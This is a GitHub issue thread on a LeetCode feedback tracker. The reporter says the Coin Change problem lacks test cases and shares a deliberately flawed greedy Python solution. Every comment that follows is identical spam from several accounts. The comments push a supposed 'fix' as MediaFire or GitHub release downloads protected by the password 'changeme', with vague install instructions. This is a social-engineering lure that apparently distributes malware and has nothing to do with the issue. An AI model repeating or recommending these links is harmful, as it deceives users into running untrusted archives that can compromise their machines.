### ISSUE TITLE
Not enough test cases

### ISSUE THREAD

**Issue by sindhujagopavarapu** [LeetCode-Feedback/LeetCode-Feedback#22944]
### LeetCode Username

sindhuja

### Problem Number, Title, and Link

322. Coin Change

### Bug Category

Missing test case *(Incorrect/Inefficient Code getting accepted because of missing test cases)*

### Bug Description

Not enough test cases in the code

### Language Used for Code

None

### Code used for Submit/Run operation

```bash
If I give test case as 5,4,2 my code should fail.

class Solution(object):
    def coinChange(self, coins, amount):
        count=0
        if(amount==0):
            return 0
        elif(amount>0):
            coins=sorted(coins, reverse=True)
            while(amount>0):
                if(amount>coins[0]):
                    amount=amount-coins[0]
                    count +=1
                else:
                    if(amount in coins):
                        count +=1
                        return count  
                    else:
                        return -1
            return count
        else:
            return -1
        """
        :type coins: List[int]
        :type amount: int
        :rtype: int
        """
```

### Expected behavior

Code should fail

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
